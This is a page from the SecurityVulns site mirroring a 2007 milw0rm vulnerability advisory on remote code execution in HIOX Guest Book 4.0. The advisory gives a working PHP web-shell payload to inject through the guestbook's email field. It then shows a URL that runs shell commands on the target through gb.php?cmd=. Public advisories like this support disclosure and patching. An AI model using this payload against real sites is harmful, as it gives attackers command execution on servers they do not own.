Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  CVE-2007-1871: Cross site scripting in chcounter 3.1.3

  E107 - (v0.7.8) Access Escalation Vulnerbility - PoC

  Critical phpwiki c99shell exploit

  CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3

From:Dj7xpl <dj7xpl_(at)_yahoo.com>
Date:11 апреля 2007 г.
Subject:HIOX GUEST BOOK (HGB) 4.0 Remote Code Execution Vulnerability

+========================I=R=A=N============================+

                    HGB Version 4.0

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Author :

Dj7xpl / Dj7xpl[at]Yahoo[dot]com

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Type :

Remote Code Execution Vulnerability

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Product / Vendor :

HIOX FREE Guest Book

http://www.hscripts.com/scripts/php/guestbook.php

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Bug :

[1] Open Target By Browser

[2] Insert Bad Code In Email                           E.g :   <?php passthru($_GET[cmd]);?>@yahoo.com

[3] See Bad C0de   :  http://[Targe]/[Path]/gb.php     E.g   :  http://dj7xpl.ir/hgb/gb.php?cmd=dir

=========================I=R=A=N=============================

#Iran_e Sarbolande Man Sarboland Mimanad
#Sp Tnx : str0ke

# milw0rm.com [2007-04-10]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород